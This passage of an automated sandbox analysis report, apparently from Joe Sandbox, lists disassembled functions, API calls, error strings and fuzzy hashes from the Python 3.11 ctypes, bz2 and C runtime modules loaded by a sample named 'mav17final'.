                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6E9C8
                                                    • Part of subcall function 00007FF8B9F6AA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B9F6947D,?), ref: 00007FF8B9F6AABD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String$SubtypeType_
                                                  • String ID: can't delete attribute$not a ctype instance
                                                  • API String ID: 3320257282-2740123057
                                                  • Opcode ID: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
                                                  • Instruction ID: 48dddbb8112aac66719dc6060950480ad4fc5b5d8fa1f1aabaedc347c98c65fa
                                                  • Opcode Fuzzy Hash: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
                                                  • Instruction Fuzzy Hash: F0113962A08F8181EB50CF2AE54006967A1FF48BF5B145132EF9D57BA8DF2CE561C700
                                                  Function 00007FF8B9F69638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_ItemSequence_String
                                                  • String ID: args not a tuple?
                                                  • API String ID: 138718260-274370407
                                                  • Opcode ID: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
                                                  • Instruction ID: e0bdafe0fde352d3699ed9b2997e2ff738e8c394afdc2f90abcff65099f95dda
                                                  • Opcode Fuzzy Hash: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
                                                  • Instruction Fuzzy Hash: 8B019E31A08F8285E6408F19E4400697B60FB45FF5F68A231DB6D577A6CF2DD4D1C300
                                                  Function 00007FF8B9F69414 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: Array does not support item deletion$invalid index
                                                  • API String ID: 1450464846-799983634
                                                  • Opcode ID: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
                                                  • Instruction ID: f439b9ca7988b7275dbc799423bfa6d95f4e4c0f561592bbc10159d9ba24ec00
                                                  • Opcode Fuzzy Hash: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
                                                  • Instruction Fuzzy Hash: 50014862A08FC681DA40DF5AE8508B82764FF95BE1F516172DB4E573A2DF3DE150C300
                                                  Function 00007FF8B9F64680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8B9F61959), ref: 00007FF8B9F68EE9
                                                    • Part of subcall function 00007FF8B9F63DC0: _PyObject_New.PYTHON311(?,?,?,?,00007FF8B9F646A2,?,?,?,00007FF8B9F61959), ref: 00007FF8B9F63DCB
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8B9F61959), ref: 00007FF8B9F68EF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_Object_String
                                                  • String ID: expected CData instance
                                                  • API String ID: 3982460303-1581534645
                                                  • Opcode ID: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
                                                  • Instruction ID: ae1bd516b893d0b856b0f4bdf21d1411e30b8d519dba8d713ff9711acff5cfe9
                                                  • Opcode Fuzzy Hash: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
                                                  • Instruction Fuzzy Hash: 92014BA1A48B86C1FB549F6DE84003827A0AF59BEAF282434CB4E477A0DF3DE055C310
                                                  Function 00007FF8B90729C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: (LLLLLL)$@
                                                  • API String ID: 1890195054-4274804333
                                                  • Opcode ID: f6d853219341f3569f1d192fdd7bc0d9c3c772da8b40e051b4c7c30d58921684
                                                  • Instruction ID: 03e630b533c34b3749f06485aa4f85c2d7dd91121d001f9f164ab851b14d5b08
                                                  • Opcode Fuzzy Hash: f6d853219341f3569f1d192fdd7bc0d9c3c772da8b40e051b4c7c30d58921684
                                                  • Instruction Fuzzy Hash: F101AD75A08BC582EF609F29F45536AB7A0FB99794F404436DB8D83759DF3CD11A8B00
                                                  Function 00007FF8B9F6B4F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AttrEqualGenericObject_StringUnicode_
                                                  • String ID: _fields_
                                                  • API String ID: 947992268-3196300388
                                                  • Opcode ID: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
                                                  • Instruction ID: 1f59a7100c68ab966b3e6f9fd0745ea4c15ea6ce132554295c500626c06e103d
                                                  • Opcode Fuzzy Hash: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
                                                  • Instruction Fuzzy Hash: 47F0F416B1C7C241E7908F6EE94426A5651AF45FE3F58A130EB5E46798CF2CD891C700
                                                  Function 00007FF8B9F6B2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Err_ItemString
                                                  • String ID: abstract class
                                                  • API String ID: 960913676-1623945838
                                                  • Opcode ID: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
                                                  • Instruction ID: 1526b0dd1531689ca3abf27488437a81f26f86ac1531c993363dc172818d5b9a
                                                  • Opcode Fuzzy Hash: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
                                                  • Instruction Fuzzy Hash: 08F0A410B0CB8680EA459FBEF89407813A0AF45BF6B186231DB1E463A5DE2CD455C300
                                                  Function 00007FF8B90C3858 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_$KeywordsPositional
                                                  • String ID: BZ2Decompressor
                                                  • API String ID: 1300771297-1337346095
                                                  • Opcode ID: 358a44a62b11731d470d0bbb96af668936168ddb6404ce11f0731b6ca31f1a24
                                                  • Instruction ID: 8e7a13a25e7da37baac3bfeadf28ece4cd7544117d59f6e26c975a7f58fd7d57
                                                  • Opcode Fuzzy Hash: 358a44a62b11731d470d0bbb96af668936168ddb6404ce11f0731b6ca31f1a24
                                                  • Instruction Fuzzy Hash: 1FF06D21B2C7C342FE549F2AA984135A2B1AF44BD0B584230EB2D97A98DF1CE84E8700
                                                  Function 00007FF8B9F6C33C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditBytes_FromSizeStringSys_
                                                  • String ID: ctypes.string_at
                                                  • API String ID: 1783689829-1910480597
                                                  • Opcode ID: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
                                                  • Instruction ID: e3a6e6372e402155a8935afc87d8a4333e18899fcc9b2c815d571b5c2a94d9f0
                                                  • Opcode Fuzzy Hash: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
                                                  • Instruction Fuzzy Hash: 69F03AA1B08AC281FB604F2AE9421782A519F55BF6F24A335CBBE827D4DE2CD184D204
                                                  Function 00007FF8B9F6C398 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditCharFromSys_Unicode_Wide
                                                  • String ID: ctypes.wstring_at
                                                  • API String ID: 614261396-2169766756
                                                  • Opcode ID: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
                                                  • Instruction ID: 180d70d14de3b6a3951f05234e41e97e2fabe105b5343bd5f75e93c063ffa1a9
                                                  • Opcode Fuzzy Hash: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
                                                  • Instruction Fuzzy Hash: 49F05E51B18A8291EE544F69F9520B96620AF08BF6B486335DB7E863E0EE6CE154C300
                                                  Function 00007FF8B9F62470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FromLong_Ssize_t
                                                  • String ID: this type has no size
                                                  • API String ID: 168540982-982649334
                                                  • Opcode ID: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
                                                  • Instruction ID: 096b5566669a33b36226922fa24d5bf5cf56f4f6cdb3773816132aa03eff705d
                                                  • Opcode Fuzzy Hash: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
                                                  • Instruction Fuzzy Hash: 3CF0C091F19B8391FE549F6AD85107827609F89FE6F182031CF0E863AADE2CF484C350
                                                  Function 00007FF8BA24EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8BA24F050: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24F110
                                                    • Part of subcall function 00007FF8BA24F050: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24EE15), ref: 00007FF8BA24F15F
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24EE3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwindabortterminate
                                                  • String ID: csm$f
                                                  • API String ID: 4189928240-629598281
                                                  • Opcode ID: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
                                                  • Instruction ID: 101a6dd11fd41e53f98f1f0b17a6c374f9a1187447936664239e22e3b01d8fbf
                                                  • Opcode Fuzzy Hash: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
                                                  • Instruction Fuzzy Hash: 2EE09B31D0835381FB206B65B28517D26A5EF49FE4F1891B4DF8806646CF7ED9949601
                                                  Function 00007FF8B9F6DDFC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: PrintableUnicode_
                                                  • String ID: '$\
                                                  • API String ID: 1291510985-1366717710
                                                  • Opcode ID: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
                                                  • Instruction ID: f2513007a45b34acf1eeda375f14e33c4f7538b518fe007d57dbdfdeed20f924
                                                  • Opcode Fuzzy Hash: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
                                                  • Instruction Fuzzy Hash: A9E04F21F18B8546FB641E2DED8427522925BA53F2F4E2131DB99053D9CD2CD881A714
                                                  Function 00007FF8B9F6E940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FormatFromUnicode_
                                                  • String ID: <Field type=%s, ofs=%zd, size=%zd>$<Field type=%s, ofs=%zd:%zd, bits=%zd>
                                                  • API String ID: 3889672380-2914491812
                                                  • Opcode ID: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
                                                  • Instruction ID: e67b0e936adf2c69a2f4edf01d2732dec0990640da6c2d58345962f70742a1d8
                                                  • Opcode Fuzzy Hash: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
                                                  • Instruction Fuzzy Hash: 97E0E566B04E82D2DA548F0DE8404A83B60FB56BA9BA50126CB4C03370CF3CD5AAC750
                                                  Function 00007FF8B9F63DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$OccurredString
                                                  • String ID: PyObject is NULL
                                                  • API String ID: 114435612-3221357749
                                                  • Opcode ID: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
                                                  • Instruction ID: 27505ec19bb24dfb1793d154a13e93e3875fc157042bf4f7430bea54ecf81395
                                                  • Opcode Fuzzy Hash: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
                                                  • Instruction Fuzzy Hash: 6DE0BF11B09A83A5EE445F1DD84013427A0AF49BF7F645439CB0E46360DF2CA055C310
                                                  Function 00007FF8B9F6F3B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_FreeMem_Pointer
                                                  • String ID: _ctypes/cfield.c pymem
                                                  • API String ID: 1268649101-2578739719
                                                  • Opcode ID: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
                                                  • Instruction ID: f91d566f97c2777f67eaa8d3eb0748db5528ea0def0e1e99b1e0b08b22718c95
                                                  • Opcode Fuzzy Hash: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
                                                  • Instruction Fuzzy Hash: 23C00250F1AB8292ED88AF59EC8613417606F49BAAF981438C60D15360EEACA59AC710
                                                  Function 00007FF8B9F6DEB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_FreeMem_Pointer
                                                  • String ID: _ctypes pymem
                                                  • API String ID: 1268649101-201515578
                                                  • Opcode ID: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
                                                  • Instruction ID: fb6cfb0e49bac64e0558dec66497e927ca49432cdf951de1ac2a5451a09e7503
                                                  • Opcode Fuzzy Hash: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
                                                  • Instruction Fuzzy Hash: 10C00210E1ABC282ED88AF19EC8557417A0AF55BABF881438C70E16360EE2CA5A9D710
                                                  Function 00007FF8BA2469DC Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA2469FB
                                                  • SetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA246A84
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                  • Instruction ID: a4f52af51b1ad67467a303afd1433ebb21cfb398eacf5c156aceaf118c0df3df
                                                  • Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                  • Instruction Fuzzy Hash: D1117520E19B1381FA149B2DAA1413532917F48FE0F0886B4DF6E077D5EE3CF441B640